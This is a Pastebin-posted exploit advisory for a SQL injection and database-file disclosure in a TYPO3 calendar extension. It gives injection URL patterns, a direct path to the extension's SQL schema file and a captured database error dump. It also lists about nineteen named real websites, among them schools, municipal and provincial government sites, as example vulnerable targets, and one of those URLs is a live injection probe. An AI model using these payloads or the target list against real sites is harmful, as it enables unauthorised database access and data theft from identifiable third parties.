Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################################################
- # Exploit Title : Typo3 Calendar Base tx_pxkalender_pi1 2.0.0 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/02/2019
- # Vendor Homepage : typo3.org
- # Software Download Link : extensions.typo3.org/extension/download/cal/2.0.0/zip/
- # Software Information Link : extensions.typo3.org/extension/cal/
- # Software Version : From 0.7.0 To 2.0.0 / All Versions
- Works with TYPO3 Free Stable Alpha Experimantal
- 3.8.0 - 4.3.99 - 8.7.99 - 9.5.99 - 6.1.0 - 8.9.99
- 6.2.0 - 6.2.99 - 6.1.0 - 6.2.99 - 4.5.5 - 6.0.99
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ###################################################################################
- # Description about Software :
- ***************************
- A calendar combining all the functions of the existing calendar
- extensions plus adding some new features. It is based on the ical standard.
- ###################################################################################
- # Impact :
- ***********
- Typo3 Calendar Base tx_pxkalender_pi1 2.0.0 [ and other versions ]
- extension for TYPO3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
- user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ###################################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?L=[ID-NUMBER]&tx_pxkalender_pi1%5Btermin%5D=[ID-NUMBER]&id=[SQL Injection]
- /typo3conf/ext/cal/res/PEAR/Date/TimeZone.php?id=[SQL Injection]
- # Database Disclosure Exploit :
- **************************
- /typo3conf/ext/cal/ext_tables.sql
- ###################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] klinikverbund-suedwest.de/index.php?L=0&tx_pxkalender_pi1%5Btermin%5D=2511&id=3084%27
- [+] creation-willigeller.com/typo3conf/ext/cal/ext_tables.sql
- [+] kupferdreh.com/typo3conf/ext/cal/ext_tables.sql
- [+] cyfra7.com/typo3conf/ext/cal/ext_tables.sql
- [+] maska.si/typo3conf/ext/cal/ext_tables.sql
- [+] belasso.de/typo3conf/ext/cal/ext_tables.sql
- [+] usk-anif.at/typo3conf/ext/cal/ext_tables.sql
- [+] emergegroup.com/typo3conf/ext/cal/ext_tables.sql
- [+] von-buelow-gymnasium.de/typo3conf/ext/cal/ext_tables.sql
- [+] jammertrust.org/typo3conf/ext/cal/ext_tables.sql
- [+] mittelhofschule-ellwangen.de/typo3conf/ext/cal/ext_tables.sql
- [+] radinfo.at/typo3conf/ext/cal/ext_tables.sql
- [+] betriebsratspraxis24.de/typo3conf/ext/cal/ext_tables.sql
- [+] gemeinde-gaiberg.de/typo3conf/ext/cal/ext_tables.sql
- [+] provincia.livorno.it/typo3conf/ext/cal/ext_tables.sql
- [+] bnr.rw/typo3conf/ext/cal/ext_tables.sql
- [+] sankt-josef.de/typo3conf/ext/cal/ext_tables.sql
- [+] foto-on-line.pl/typo3conf/ext/cal/ext_tables.sql
- [+] versicherungspraxis24.de/typo3conf/ext/cal/ext_tables.sql
- ###################################################################################
- # Example SQL Database Error :
- ****************************
- array(4 items)
- caller =>
- 'TYPO3\CMS\Core\Database\DatabaseConnection::exec_SELECTquery' (60 chars)
- ERROR =>
- ***********
- 'You have an error in your SQL syntax; check the manual that corresponds to y
- our MariaDB server version for the right syntax to use near ') AND pages.del
- eted=0 AND pages.t3ver_state<=0 AND pages.pid<>-1 AND pages.hidde' at line 1' (228 chars)
- lastBuiltQuery =>
- ****************
- 'SELECT * FROM pages WHERE 1 AND uid IN () AND pages.deleted=0 AND pages.t3ve
- r_state<=0 AND pages.pid<>-1 AND pages.hidden=0 AND pages.starttime<=1550510
- 640 AND (pages.endtime=0 OR pages.endtime>1550510640) AND (pages.fe_group=''
- OR pages.fe_group IS NULL OR pages.fe_group='0' OR FIND_IN_SET('0',pages.fe
- _group) OR FIND_IN_SET('-1',pages.fe_group))' (348 chars)
- debug_backtrace =>
- ******************
- 'call_user_func#34 // {closure}# // TYPO3\CMS\Frontend\Http\Application->run#
- 33 // TYPO3\CMS\Core\Core\Bootstrap->handleRequest#78 // TYPO3\CMS\Frontend\
- Http\RequestHandler->handleRequest#307 // TYPO3\CMS\Frontend\Controller\Typo
- ScriptFrontendController->INTincScript#232 // TYPO3\CMS\Frontend\Controller\
- TypoScriptFrontendController->recursivelyReplaceIntPlaceholdersInContent#348
- 8 // TYPO3\CMS\Frontend\Controller\TypoScriptFrontendController->INTincScrip
- t_process#3522 // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cO
- bjGetSingle#3577 // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->
- render#859 // TYPO3\CMS\Frontend\ContentObject\UserContentObject->render#943
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->callUserFunction
- #40 // call_user_func_array#7316 // tx_pxkalender_pi1->main# // tx_pxkalende
- r_pi1->getSingleTermin#263 // tx_pxkalender_pi1->model_getAbteilungenByUidLi
- st#335 // TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTquery#300 /
- / TYPO3\CMS\Core\Database\DatabaseConnection->debug#314' (1043 chars)
- ###################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###################################################################################
Add Comment
Please, Sign In to add comment